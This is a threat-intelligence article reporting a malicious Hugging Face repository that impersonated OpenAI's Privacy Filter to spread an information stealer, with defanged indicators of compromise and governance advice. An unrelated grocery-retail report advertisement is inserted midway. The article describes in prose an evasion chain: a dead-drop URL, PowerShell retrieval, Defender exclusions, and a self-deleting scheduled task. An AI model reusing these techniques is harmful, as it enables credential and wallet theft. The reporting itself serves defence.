The fundamental value proposition of any software marketplace is trust. Developers, researchers, enterprise teams, and organizations building on technologies from OpenAI use platforms like Hugging Face because they expect that trending, highly-downloaded repositories represent legitimate, community-validated resources. That trust assumption is now being systematically exploited, and the speed at which a malicious repository can accumulate download volume before detection is a number that every enterprise security and AI governance team needs to internalize.

A fraudulent Hugging Face repository impersonating OpenAI’s Privacy Filter model reached the number one trending position on the platform and accumulated approximately 244,000 downloads and 667 likes within 18 hours of activity. The download count was almost certainly artificially inflated to manufacture the appearance of community legitimacy. The technique worked. Users who applied standard platform trust signals, trending position, high download count, community engagement metrics, downloaded an information stealer packaged as a privacy tool.

Hugging Face has since disabled access to the malicious repository. The damage from 244,000 download events, even accounting for significant artificial inflation of that figure, is not undone by disabling a repository after the fact.

As the recent Hugging Face supply chain attack exposed, trust signals like download counts and trending rankings can create a dangerous illusion of reliability while masking real operational risk underneath. Grocery retail faces a strikingly similar challenge: inventory systems may report high accuracy, yet shelves, fulfillment workflows, and customer orders often tell a very different story. The real issue is not visibility on paper, but whether inventory is truly sellable, findable, and fulfillable in real time. This report explores how leading retailers are moving beyond surface-level accuracy metrics by integrating real-time execution signals into planning, forecasting, and fulfillment decisions—helping reduce substitutions, improve operational confidence, and protect customer trust in increasingly digital retail environments.

Download the report to learn how retailers are closing the gap between inventory accuracy and real-world execution.

How the Attack Was Constructed and Why It Was Effective

The technical construction of this campaign reflects a level of operational sophistication that goes well beyond opportunistic typosquatting. Understanding the attack chain in detail matters for enterprise security teams designing detection and prevention controls around AI model supply chain risk.

The malicious repository, named Open-OSS/privacy-filter, copied the entire model card description from OpenAI’s legitimate openai/privacy-filter release verbatim. Casual inspection of the repository page would reveal no meaningful difference from the authentic version. The typosquat was in the account namespace, not the repository name, a distinction that requires deliberate attention to catch and that most developer workflows do not enforce at the point of cloning.

The infection mechanism was embedded in a loader.py file that presented as routine dependency configuration. On Windows, users were directed to run a batch script. The Python script, once executed, initiated a multi-stage infection chain designed with evasion at every layer.

The Technical Evasion Architecture

The loader script disabled SSL verification, decoded a Base64-encoded URL hosted on a public JSON paste service called JSON Keeper, and used that URL to retrieve a PowerShell command for execution. The use of JSON Keeper as a dead drop resolver is a specific evasion technique that deserves attention: by hosting the payload pointer on a legitimate public service rather than attacker-controlled infrastructure, the attackers could switch payloads dynamically without modifying the repository, and could bypass network controls that block known malicious domains while allowing traffic to legitimate paste services.

The PowerShell command reached out to a remote server at api.eth-fastscan[.]org to download a second-stage batch script that elevated privileges through a UAC prompt, configured Microsoft Defender Antivirus exclusions, downloaded the final payload, and established a scheduled task for SYSTEM-context execution. The scheduled task destroyed itself before any reboot, making the infection mechanism a one-shot launcher that leaves minimal persistence artifacts for forensic recovery.

The final payload was a Rust-based information stealer targeting Discord accounts, cryptocurrency wallets and browser extensions, system metadata, FileZilla configurations, wallet seed phrases, and browser data across Chromium and Gecko-based browsers. Anti-debugging, sandbox detection, virtual machine checks, and active attempts to disable Windows Antimalware Scan Interface and Event Tracing for Windows were embedded throughout the execution chain.

The result is a campaign where the initial infection vector, a trusted AI model platform, the evasion architecture, and the payload delivery mechanism were all engineered to defeat the standard detection layers enterprise security teams rely on.

Six Additional Repositories and a Broader Campaign Infrastructure

HiddenLayer’s investigation uncovered six additional repositories operating with similar Python loader mechanisms to deploy the same stealer, all attributed to an account named anthfu. The repositories presented as model releases for Bonsai, Qwen, DeepSeek, and other AI model families that carry significant brand recognition in the AI development community.

The shared infrastructure across these repositories, specifically the api.eth-fastscan[.]org domain, connects to a separate campaign involving a malicious npm package named trevlo that was downloaded more than 2,300 times before removal. That package delivered ValleyRAT, also known as Winos 4.0, a modular remote access trojan with persistent attribution to Silver Fox, a Chinese threat actor group.

ValleyRAT’s typical distribution vectors have been phishing and search engine optimization poisoning. The use of npm and Hugging Face repositories as delivery mechanisms represents a documented expansion of this threat actor’s initial access playbook into open-source software supply chain territory. HiddenLayer’s assessment that the shared infrastructure suggests a broader coordinated supply chain operation targeting open-source ecosystems is significant because it reframes this campaign from an isolated typosquatting event to a sustained, multi-platform supply chain attack with nation-state adjacent attribution.

For enterprise threat intelligence programs, the infrastructure overlap between the Hugging Face campaign and the trevlo npm campaign provides a network of indicators of compromise that should be run against internal telemetry immediately.

Why AI Model Repositories Have Become a Priority Supply Chain Attack Surface

The Hugging Face campaign exploits a specific gap in how enterprise security programs have evolved in response to supply chain risk. Most mature enterprise security organizations have implemented software composition analysis tooling, dependency scanning for application code, and controls around npm, PyPI, and similar package registries. Those controls were built in response to well-documented supply chain attack campaigns targeting traditional software development pipelines.

AI model repositories represent a newer and currently less governed attack surface. Enterprise teams consuming models from Hugging Face are frequently applying lighter due diligence than they would apply to a third-party code dependency, treating model files as data artifacts rather than executable supply chain components. That distinction is incorrect in practice. The loader scripts, configuration files, and execution instructions that accompany AI model releases are code, and they carry the same supply chain risk profile as any other third-party software component.

The privacy irony embedded in this specific campaign is worth noting. OpenAI’s Privacy Filter was released as a tool to detect and redact personally identifiable information in unstructured text, designed to help enterprises build privacy protections into AI applications. The malicious version impersonating it delivered an information stealer that harvested exactly the kind of sensitive data the legitimate tool was designed to protect. Enterprise teams evaluating AI privacy tooling, a category that carries inherent credibility in compliance-focused organizations, are precisely the population most likely to be deceived by a high-fidelity impersonation of a trusted release in that category.

The Platform Trust Metric Problem

The manufactured social proof dimension of this campaign deserves specific attention from enterprise AI procurement and governance teams.

Trending position and download counts are the primary trust signals that most platforms, including Hugging Face, surface to users evaluating whether a repository is legitimate. The artificial inflation of these metrics to 244,000 downloads and 667 likes within 18 hours was not a peripheral detail of the attack. It was the core deception mechanism. Users who would have applied appropriate skepticism to an unknown repository with minimal downloads applied significantly less scrutiny to what appeared to be a massively popular community resource.

This creates a structural problem for enterprises using platform popularity metrics as any component of their AI model evaluation process. Automated inflation of download counts and engagement metrics is a known, documented technique in software supply chain attacks. Any security or procurement process that treats these figures as a credibility signal without independent verification is vulnerable to exactly this class of manipulation.

Enterprise AI governance programs should explicitly remove platform popularity metrics from their model evaluation criteria and replace them with verification steps that are resistant to artificial inflation: confirmed organizational ownership of the publishing account, cryptographic verification of model integrity against known-good checksums, network behavior analysis of any execution scripts accompanying the model, and sandbox testing of the full execution environment before deployment to developer endpoints.

Indicators of Compromise and Immediate Response Priorities

Security and threat intelligence teams should act on the following indicators documented in the HiddenLayer research:

The domain api.eth-fastscan[.]org served both the Hugging Face stealer payload and a separate executable beaconing to welovechinatown[.]info, the C2 infrastructure associated with the Silver Fox ValleyRAT campaign.

If we see any information that shows a connection to either of these domains we need to look into it right away.

We found out that the recargapopular[.]com domain is getting data from infected systems and it is in JSON format. If we see any connections going out to this domain from our company computers we should think of it as a sign that they are infected for sure.

There are six anthfu account repositories, on Hugging Face that could be a problem. They might have downloads that’re not safe and security teams should check for them in the list of things they use to make AI.

The trevlo npm package and its associated execution chain, including the CodeRun102.exe Winos 4.0 stager, provide additional indicators for teams with Node.js development environments.

For organizations that cannot confirm whether developer endpoints connected to any of the affected repositories during the exposure window, credential rotation for accounts accessible from those endpoints is the appropriate immediate response. The stealer’s targeting of browser-stored credentials, cryptocurrency wallets, and Discord accounts means the personal and professional account separation of affected developers becomes a relevant secondary risk surface.

The Enterprise AI Governance Gap This Campaign Exposes

The broader implication of the Hugging Face campaign for enterprise security leadership extends beyond this specific incident. It documents the arrival of sophisticated, nation-state adjacent threat actors in the AI model supply chain, operating with evasion techniques and infrastructure specifically engineered for this attack surface.

Enterprise organizations that have deployed AI development programs without extending their supply chain security governance to cover AI model repositories are carrying a gap that this campaign has now proven is actively exploited. The remediation is not technically complex, but it requires deliberate program design decisions that most AI governance frameworks have not yet incorporated.

Verification requirements for AI model downloads, mandatory sandbox analysis of any execution scripts accompanying model files, network monitoring for connections to AI model platform domains from developer endpoints, and removal of platform popularity metrics as trust signals are the foundational controls this campaign argues for. None of them require new tooling investment. They require policy decisions and enforcement within existing security program infrastructure.

The organizations that treat this campaign as an isolated incident rather than a category signal will encounter the next iteration of this attack surface without the controls to detect or prevent it. The organizations that treat it as evidence that AI model supply chain governance requires the same maturity as traditional software supply chain security will be structurally better positioned when that next campaign arrives.

Research and Intelligence Sources: Hiddenlayer

To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com



🔒 Login or Register to continue reading